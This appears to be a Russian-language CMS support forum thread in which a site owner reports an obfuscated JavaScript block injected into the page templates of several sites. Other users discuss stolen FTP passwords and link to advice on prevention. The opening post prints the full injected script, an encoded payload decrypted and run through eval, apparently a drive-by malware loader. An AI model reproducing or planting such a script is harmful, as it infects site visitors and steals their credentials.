Повальный взлом?

[inokentik 45]

Что за ерунда? Новые дырки или хостеры? Есть 3 сайта и в всех трех обнаружил код следующего содержания

<script language='javascript' type='text/javascript'>var pingTar;pingTar='%54%56%5b%56%53%55%57%52%21%56%59%65%5c%6a%4b%42%6c%77%78%16%17%4b%5b%40%4e%62%48%16%4b%54%63%7c%0b%06%2e%22%5a%42%47%59%78%75%49%48%65%41%1b%41%57%5b%51%5b%7f%79%47%5c%28%47%52%08%57%77%75%4a%56%1f%5e%6d%50%55%41%54%55%57%1f%1e%62%4a%50%46%4e%4a%52%58%1e%18%5d%5a%75%49%17%50%4d%53%35%41%51%61%0f%48%56%11%56%5e%5d%42%6e%55%45%1f%4e%56%5d%57%17%46%53%62%65%4f%6f%5a%4e%2d%24%0b%32%1f%55%59%59%67%14%77%47%5d%56%66%70%13%0d%3f%20%0b%18%4c%45%0a%42%78%54%6b%75%54%5e%64%4a%7b%04%50%40%53%59%41%4a%48%75%0a%50%6f%4b%56%03%03%57%5a%5d%4e%53%1c%4f%6e%58%56%13%46%01%6f%45%48%14%7c%50%44%71%12%2a%1d%51%1a%4b%71%54%6d%17%6c%50%0a%7b%40%56%10%67%46%64%5f%1d%1d%16%73%45%4d%65%51%51%69%12%25%0a%1e%2c%31%3d%08%02%38%1a%3b%34%69%49%5b%0f%49%5b%48%4b%1a%57%58%57%53%45%6d%2c%5a%18%59%56%3d%38%18%10%1b%58%43%43%60%66%43%17%43%50%5b%4f%51%0e%24%13%03%4a%54%4e%4c%43%74%47%1d%1e%56%18%59%77%73%4e%72%6c%5b%5d%0a%49%55%0e%3e%1d%18%50%1b%42%5a%45%59%4e%77%57%40%6a%19%0e%1d%5d%64%7b%57%1f%13%52%48%2f%0e%6d%1f%0b%59%42%53%59%14%38%63%44%54%4a%1e%13%14%33%01%67%52%56%49%69%09%4e%50%5a%6a%18%4d%1a%3c%09%58%55%54%66%4d%56%6e%5a%0c%32%04%4d%3f%48%1d%01%51%11%68%5a%1d%3c%43%57%02%4e%51%53%4a%54%7c%3e%1a%44%70%5b%57%15%5f%74%5a%53%15%59%71%57%5a%50%69%68%43%12%4f%54%0e%0b%68%6f%46%01%61%4c%45%53%4e%40%24%76%56%6b%51%3d%43%15%4b%7b%54%3f%5c%0a%5f%4b%5f%56%79%7e%5d%33%41%55%0b%4e%47%68%07%2b%0d%03%1c%1a%5e%56%66%52%4a%5d%7d%10%41%4a%04%23%01%67%4b%56%54%0b%46%4e%65%74%6d%4f%14%17%19%10%15%6d%48%4d%56%33%50%5e%40%67%6c%48%06%18%1a%77%56%42%52%42%50%06%57%52%7d%58%0b%07%67%55%6d%54%63%0a%55%11%1c%2f%23%5b%57%65%4a%5a%0e%2e%7f%45%4a%7d%59%50%5a%45%45%59%45%14%12%1a%07%2e%55%65%47%50%45%51%1e%1e%57%61%63%1f%10%0b%1e%48%53%69%49%23%5a%56%58%7e%75%5d%58%6b%4f%5e%4e%1d%32%09%47%72%7e%6a%54%0e%36%01%1d%0a%0f%68%42%63%4f%55%54%0e%36%01%61%43%65%5e%0b%48%71%5a%59%66%14%19%7c%4b%79%45%17%44%7e%52%6e%51%11%41%1a%64%54%7f%3c%0f%5b%50%5d%58%1d%62%7a%49%4c%50%19%1c%2a%53%05%7f%30%49%73%7c%74%6b%5c%43%16%45%09%7a%05%7f%08%1d%71%62%16%3d%45%56%4e%5c%58%45%74%74%66%23%0e%7a%57%53%16%78%7c%4a%5b%72%49%55%27%13%36%4f%51%42%51%76%7d%45%64%68%7f%24%63%1c%70%48%5e%10%6b%1f%50%59%4b%5c%4d%4a%01%1e%16%56%09%42%5c%5d%57%6b%47%4b%7b%48%62%0d%5a%18%53%38%41%5f%50%1f%50%54%5d%47%64%1b%27%14%09%18%18%58%6d%44%5a%44%1b%40%1d%1b%4f%2e%43%70%4f%14%45%44%5b%08%61%1b%58%49%5a%6d%48%74%55%69%41%54%42%77%5f%77%68%5c%3a%15%51%43%61%5e%19%02%13%6d%20%5d%42%06%12%08%05%4b%6d%45%19%45%72%55%67%42%40%65%6f%70%54%0e%41%48%50%42%2d%4e%5c%41%60%55%4b%7f%5c%64%4b%33%5c%5b%5f%57%47%77%62%5d%2e%1d%43%14%53%5f%47%46%58%71%4e%7b%62%5d%0e%04%77%73%4b%51%65%41%4c%32%12%26%7e%13%06%04%02%01%32%06%78%70%51%5c%42%53%5a%53%4f%60%6d%51%13%79%54%42%31%53%66%51%15%02%57%54%69%5b%4c%47%49%68%02%4e%57%51%45%0f%7d%78%56%53%55%55%10%0a%46%4b%19%5d%76%69%4d%47%62%78%7a%0f%03%08%03%51%7f%59%04%04%59%5c%0f%4c%5f%45%12%25%25%0d%0e%50%03%46%5a%2f%5e%67%31%5b%03%0e%42%45%7f%73%03%52%5f%50%06%50%56%46%6f%41%44%04%7b%59%55%11%66%7e%45%43%4b%11%14%0c%44%70%78%15%56%4d%57%6a%7d%50%58%73%59%52%58%38%4d%46%41%4d%5e%48%4c%75%58%45%3a%0b%07%21%78%5f%73%17%6f%4e%41%74%76%5e%4e%6f%76%0b%60%77%64%65%6b%43%5b%46%4d%6e%59%43%63%20%5c%42%43%7b%55%29%50%71%08%31%13%49%54%49%12%48%54%47%45%7d%56%09%16%1f%0a';function conMap(pastThe){function bosMaskMax(badLogPong){var fiTabCow=0;var maskMidWil=badLogPong.length, nutNull=0;while(nutNull<maskMidWil){fiTabCow+=beChar(badLogPong,nutNull)*maskMidWil;nutNull++;}return (fiTabCow+'');}function beChar(conGun,catNs){return conGun['cZhZaZrzCSoldSeSAZtZ'.replace(/[ZlzSG]/g, '')](catNs);}if((new String(document.write)).indexOf('arity')>0){return;}var nanoLoop=0,pisAb=0,nsPut=98;var bcMid='';var onRar=(new String(conMap)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var tipBedPip=bosMaskMax(onRar);pastThe=window['u{n@e#s#c@a0pme@'.replace(/[m#@\{0]/g, '')](pastThe);for(var itExit=0; itExit < (pastThe.length); itExit++){var mapMegaMap=beChar(onRar,nanoLoop);var onMapFog=beChar(tipBedPip,pisAb);var conWho=mapMegaMap^onMapFog^nsPut;var cpGun=beChar(pastThe,itExit);nanoLoop++,pisAb++;bcMid+=String['fDr6oDmICIhba6rbC6o9dDe6'.replace(/[bI69D]/g, '')](cpGun^conWho);if(pisAb>tipBedPip.length)pisAb=0;if(nanoLoop>onRar.length)nanoLoop=0;}window['e<v]a]lf'.replace(/[#\.f\]\<]/g, '')](bcMid);return bcMid=new String();}conMap(pingTar);</script>

На всех трех сайтах, во всех страницах main.tpl во всех шаблонах! Не особо удивился ы ,еслиб только у меня, но также у знакомого обнаружен данный баг! Везде движки оригиналы! Что за фигня такая? Подумал на хостера, но у нас хостеры разные... У кого то есть еще подобное????

[llbarmenll 18]

На двух сайтах всё чисто У вас стоит чистый двиг?

тьфу-тьфу что бы не было опять глобального бага

[inokentik 45]

Я же написал, чистый

Вчера человеку на tutdesign.ru удаляли! Поменялипаоли на фтп, сегодня опять код появился, что может быть такое??????

[hotdj 33]

Я же написал, чистый

Вчера человеку на tutdesign.ru удаляли! Поменялипаоли на фтп, сегодня опять код появился, что может быть такое??????

Может модуль какой установили нехороший ?

[inokentik 45]

Лично у меня все только стандартными средствами движка, ничего стороннего и лишнего нет! Можете сайт глянуть в подписи, но тем не менее правка кода была обнаружена и не пойму как это произошло!

[hotdj 33]

==========

кстати по своему сайту моб софта. у меня трубка 5600 xpress music,, чё там для неё нарыть мона ?? дай ссылки на категории для неё )) а то симбианы незнаю какие версии )) 9 ?

Чтото я несмог нати в исходнике что либо лишее кроме ровного кода )

[inokentik 45]

Такой модели я не слышал и на сайте nokia.ru такой тоже нет... Ежели Вы имели ввиду 5610 xpress music, то это 40 серия и у меня нет раздела для данной трубки, это не симбиан! Вы уточните модель точней!

==========

кстати по своему сайту моб софта. у меня трубка 5600 xpress music,, чё там для неё нарыть мона ?? дай ссылки на категории для неё )) а то симбианы незнаю какие версии )) 9 ?

Чтото я несмог нати в исходнике что либо лишее кроме ровного кода )

Я ждать не собираюсь пока кто-то отхватит вирусы! Есесвенно код был удален уже!!!

[hotdj 33]

Модель уточнил, 5800 )))

=======

а вот сам теперь буду сидеть, вдруг что-то на самом деле, бекап уже сделал ))

а какой хостинг ?

а где был код ? в начала или конце ??

[inokentik 45]

Nokia 5800 это Symbian 9.4, тебе сюда http://www.mobile-soft.su/symbian-9-4/

А код был сразу после тэга <body> и он довольно большой, из 1-го поста видно!

[hotdj 33]

Спасиб.

Честно незнаю, пока у меня такого нет, может мой сайт не такой известный чтобы был повод его взламывать )) хотя версия 8.2 когда была ломанули ))

[celsoft 6 081]

Что за ерунда? Новые дырки или хостеры? Есть 3 сайта и в всех трех обнаружил код следующего содержания

почему новые? Уже ниодин год. Читайте темы:

http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979

http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe

много полезной информации о причинах и методах предотвращения.

[hotdj 33]

Что за ерунда? Новые дырки или хостеры? Есть 3 сайта и в всех трех обнаружил код следующего содержания

почему новые? Уже ниодин год. Читайте темы:

http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979

http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe

много полезной информации о причинах и методах предотвращения.

интересно, задумывался только если пароли сохранять в браузере или нет. А вот по поводу остального недумал. Т.е. заходишь на сайт, получаешь скриптовый вирус на комп, а он уже шлёт пассы все, умно сделанно, будем думать что да как!